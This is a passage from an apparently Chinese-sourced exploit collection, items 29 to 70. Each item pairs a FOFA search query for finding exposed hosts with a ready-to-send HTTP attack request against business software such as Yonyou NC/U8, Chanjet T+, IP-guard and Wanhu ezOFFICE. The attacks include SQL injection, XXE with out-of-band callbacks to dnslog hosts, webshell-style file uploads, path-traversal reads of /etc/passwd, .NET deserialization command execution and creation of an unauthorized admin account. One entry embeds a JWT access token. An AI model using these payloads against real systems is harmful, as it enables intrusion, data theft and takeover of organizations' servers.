------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
